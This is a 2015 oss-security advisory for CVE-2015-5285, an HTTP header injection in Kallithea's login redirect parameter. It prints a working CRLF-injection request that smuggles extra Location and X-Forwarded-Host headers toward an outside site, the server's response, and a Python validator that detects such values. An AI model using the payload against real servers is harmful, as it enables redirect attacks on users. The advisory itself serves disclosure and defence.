Message-ID: <560EE54D.3030508@shadura.me>
Date: Fri, 2 Oct 2015 22:13:01 +0200
From: Andrew Shadura <andrew@...dura.me>
To: oss-security@...ts.openwall.com
Subject: CVE-2015-5285: Kallithea: HTTP header injection
HTTP header injection
Synopsis
========
A vulnerability has been found in Kallithea, allowing attackers to inject
arbitrary headers into the server response for certain URLs.
Description
===========
HTTP header injection was possible in login-related code of Kallithea, allowing attackers to inject arbitrary headers into the server responses.
The vulnerability affects the `came_from` `GET` parameter.
Example of a malicious request:
GET /_admin/login?came_from=1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438
Corresponding response:
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress
<html>
<head>
<title>302 Found</title>
</head>
<body>
<h1>302 Found</h1>
The resource was found at <a href="http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk ">http://192.168.0.28:8080/_admin/1
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk </a>;
you should be redirected automatically.
</body>
</html>
Impact
======
The bug allows an attacker to override important response headers, possibly redirecting users to a malicious website or making other middleware misbehave when it trusts the response headers.
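The root cause is that a query value containing CR/LF is copied into the Location header unchanged, so the server emits the attacker's extra header lines. The following added example (written for this post, not the Kallithea project's own fix, with hypothetical helper names) shows the two checks an application should apply to a redirect parameter such as `came_from`: reject any decoded value containing control characters, and only accept a same-site absolute path, using the request quoted above as the sample input.

```python
import re
from urllib.parse import unquote, urlsplit

# Any CR, LF or other control byte in a value that is reflected into a
# response header would terminate the header line; refuse such values.
_CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def has_injected_headers(raw):
    """Detection check: True if the decoded query value could split a header."""
    return bool(_CONTROL_CHARS.search(unquote(raw or "")))


def safe_came_from(raw, default="/"):
    """Return a redirect target that is safe to place in a Location header.

    Hypothetical helper, not Kallithea's fix.  Only a same-site absolute
    path (a single leading '/') survives; a value with control characters,
    a scheme or a host (which would also be an open redirect) falls back
    to `default`.
    """
    if raw is None:
        return default
    value = unquote(raw)          # decode %0d%0a etc. before checking
    if _CONTROL_CHARS.search(value):
        return default
    parts = urlsplit(value)
    if parts.scheme or parts.netloc:
        return default            # absolute URL: off-site redirect
    if not value.startswith("/") or value.startswith(("//", "/\\")):
        return default            # '//host' is protocol-relative in browsers
    return value


# Constructed sample: the came_from value from the request quoted in this advisory.
MALICIOUS = ("1%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk"
             "%01%02%0d%0aLocation%3a%20http://zeroscience.mk")

if __name__ == "__main__":
    print(has_injected_headers(MALICIOUS))   # True
    print(safe_came_from(MALICIOUS))          # /
    print(safe_came_from("%2F"))              # /
    print(safe_came_from("/repo/summary"))    # /repo/summary
```

Many WSGI servers and frameworks now refuse control characters in header values themselves, but validating the parameter where the application reads it keeps the check independent of the deployment stack.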
Resolution
==========
The Kallithea project has fixed this issue in the stable branch. Users are recommended to upgrade to the latest 0.3 release.
Affected versions
=================
The issue is present in Kallithea versions before 0.3.
Acknowledgments
===============
Thanks to Gjoko Krstic of Zero Science Lab for reporting this issue.
References
==========
[0] Kallithea Project
<https://kallithea-scm.org/>
[1] CVE-2015-5285
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285>
[2] Kallithea: Security Notice CVE-2015-5285
<https://kallithea-scm.org/security/cve-2015-5285.html>
[3] Mercurial changeset fixing the issue
<https://kallithea-scm.org/repos/kallithea/changeset/38d1c99cd0005c1df5a37692615356c918dbe068>
[4] Zero Science Lab
<http://www.zeroscience.mk/en/>
--
Cheers,
Andrew Shadura
on behalf of Kallithea Security Team